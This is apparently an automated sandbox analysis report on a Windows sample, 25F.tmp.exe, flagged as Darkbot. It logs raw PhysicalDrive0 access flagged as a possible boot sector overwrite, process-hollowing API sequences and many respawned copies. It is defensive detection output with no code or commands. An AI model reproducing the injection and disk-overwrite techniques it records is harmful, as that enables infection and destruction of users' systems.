            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
            Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.22:49181 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.22:49180 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.22:49175 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.22:49174 version: TLS 1.2

            Operating System Destruction

            barindex
            Contains functionality to access PhysicalDrive, possible boot sector overwrite
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00369D90 CreateFileA on filename \\.\PHYSICALDRIVE04_2_00369D90
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00409D90 CreateFileA on filename \\.\PHYSICALDRIVE04_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003D9D90 CreateFileA on filename \\.\PHYSICALDRIVE09_2_003D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_00189D90 CreateFileA on filename \\.\PHYSICALDRIVE010_2_00189D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_00389D90 CreateFileA on filename \\.\PHYSICALDRIVE011_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_00419D90 CreateFileA on filename \\.\PHYSICALDRIVE012_2_00419D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001B9D90 CreateFileA on filename \\.\PHYSICALDRIVE013_2_001B9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_00359D90 CreateFileA on filename \\.\PHYSICALDRIVE014_2_00359D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_00319D90 CreateFileA on filename \\.\PHYSICALDRIVE015_2_00319D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_00389D90 CreateFileA on filename \\.\PHYSICALDRIVE016_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_00109D90 CreateFileA on filename \\.\PHYSICALDRIVE017_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_00109D90 CreateFileA on filename \\.\PHYSICALDRIVE018_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_00229D90 CreateFileA on filename \\.\PHYSICALDRIVE019_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_00329D90 CreateFileA on filename \\.\PHYSICALDRIVE020_2_00329D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_00519D90 CreateFileA on filename \\.\PHYSICALDRIVE021_2_00519D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_00199D90 CreateFileA on filename \\.\PHYSICALDRIVE022_2_00199D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_00849D90 CreateFileA on filename \\.\PHYSICALDRIVE023_2_00849D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_00409D90 CreateFileA on filename \\.\PHYSICALDRIVE025_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_00829D90 CreateFileA on filename \\.\PHYSICALDRIVE026_2_00829D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_00099D90 CreateFileA on filename \\.\PHYSICALDRIVE027_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005D9D90 CreateFileA on filename \\.\PHYSICALDRIVE029_2_005D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_00099D90 CreateFileA on filename \\.\PHYSICALDRIVE030_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_00919D90 CreateFileA on filename \\.\PHYSICALDRIVE031_2_00919D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_00399D90 CreateFileA on filename \\.\PHYSICALDRIVE032_2_00399D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_00099D90 CreateFileA on filename \\.\PHYSICALDRIVE033_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_00229D90 CreateFileA on filename \\.\PHYSICALDRIVE034_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_00159D90 CreateFileA on filename \\.\PHYSICALDRIVE035_2_00159D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F9D90 CreateFileA on filename \\.\PHYSICALDRIVE036_2_007F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_00259D90 CreateFileA on filename \\.\PHYSICALDRIVE037_2_00259D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_00269D90 CreateFileA on filename \\.\PHYSICALDRIVE038_2_00269D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F9D90 CreateFileA on filename \\.\PHYSICALDRIVE039_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F9D90 CreateFileA on filename \\.\PHYSICALDRIVE040_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_00289D90 CreateFileA on filename \\.\PHYSICALDRIVE041_2_00289D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_00109D90 CreateFileA on filename \\.\PHYSICALDRIVE042_2_00109D90
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Start Page Redirect CacheJump to behavior

            System Summary

            barindex
            Yara detected Darkbot
            Source: Yara matchFile source: Process Memory Space: 25F.tmp.exe PID: 3356, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 25F.tmp.exe PID: 3380, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 652, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2384, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1440, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2096, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1804, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 892, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1968, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 172, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 492, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1396, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 816, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1012, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1668, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2836, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1756, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2672, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2704, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2868, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 3068, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2688, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1452, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1060, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2248, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1448, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 2228, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1260, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 1852, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 724, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QgGhoOpxHPl.exe PID: 772, type: MEMORYSTR
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00609014 LoadLibraryA,LoadLibraryA,CreateProcessA,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00609014
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00401170 ShowCaret,ShowCaret,ShowCaret,NtUnmapViewOfSection,ShowCaret,VirtualAllocEx,ShowCaret,WriteProcessMemory,ShowCaret,ShowCaret,ShowCaret,WriteProcessMemory,ShowCaret,ShowCaret,WriteProcessMemory,ShowCaret,ShowCaret,Wow64SetThreadContext,ShowCaret,ResumeThread,2_2_00401170
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00365C50 NtQueryInformationProcess,4_2_00365C50
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00364D00 GetVersionExA,strncpy,NtQueryInformationProcess,4_2_00364D00
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00365820 memset,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,InterlockedCompareExchange,WideCharToMultiByte,Sleep,CloseHandle,4_2_00365820
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00363440 printf,printf,printf,NtAllocateVirtualMemory,4_2_00363440
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_003656E0 NtQuerySystemInformation,NtQuerySystemInformation,4_2_003656E0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_003653D0 NtQueryInformationThread,OpenProcess,NtQueryInformationProcess,InterlockedCompareExchange,VirtualAllocEx,WriteProcessMemory,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,CloseHandle,4_2_003653D0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_004056E0 NtQuerySystemInformation,NtQuerySystemInformation,4_2_004056E0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00404D00 GetVersionExA,strncpy,NtQueryInformationProcess,4_2_00404D00
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00403440 printf,printf,printf,NtAllocateVirtualMemory,4_2_00403440
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00405C50 NtQueryInformationProcess,4_2_00405C50
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00405820 memset,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,InterlockedCompareExchange,WideCharToMultiByte,Sleep,CloseHandle,4_2_00405820
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_004053D0 NtQueryInformationThread,OpenProcess,NtQueryInformationProcess,InterlockedCompareExchange,VirtualAllocEx,WriteProcessMemory,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,CloseHandle,4_2_004053D0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00369E7B: WriteFile,DeviceIoControl,4_2_00369E7B
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00362D604_2_00362D60
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00402D604_2_00402D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003D2D609_2_003D2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_00182D6010_2_00182D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_00382D6011_2_00382D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_00412D6012_2_00412D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001B2D6013_2_001B2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_00352D6014_2_00352D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_00312D6015_2_00312D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_00382D6016_2_00382D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_00102D6017_2_00102D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_00102D6018_2_00102D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_00222D6019_2_00222D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_00322D6020_2_00322D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_00512D6021_2_00512D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_00192D6022_2_00192D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_00842D6023_2_00842D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_00402D6025_2_00402D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_00822D6026_2_00822D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_00092D6027_2_00092D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005D2D6029_2_005D2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_00092D6030_2_00092D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_00912D6031_2_00912D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_00392D6032_2_00392D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_00092D6033_2_00092D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_00222D6034_2_00222D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_00152D6035_2_00152D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F2D6036_2_007F2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_00252D6037_2_00252D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_00262D6038_2_00262D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F2D6039_2_003F2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F2D6040_2_003F2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_00282D6041_2_00282D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_00102D6042_2_00102D60
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: String function: 0040BA00 appears 37 times
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: String function: 00608CB8 appears 34 times
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: String function: 00603DEC appears 34 times
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: String function: 0036BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0032BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0040BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0022A310 appears 46 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0009BA00 appears 111 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0041BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0015BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 007FBA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0031BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 003FB990 appears 48 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0038B990 appears 48 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0025BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0026BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0010B990 appears 72 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0035BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0091BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 001BBA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0022BA00 appears 74 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0009A310 appears 69 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0051BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0038BA00 appears 74 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0038A310 appears 46 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 005DBA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0039BA00 appears 37 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 0022B990 appears 48 times
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: String function: 003FA310 appears 46 times
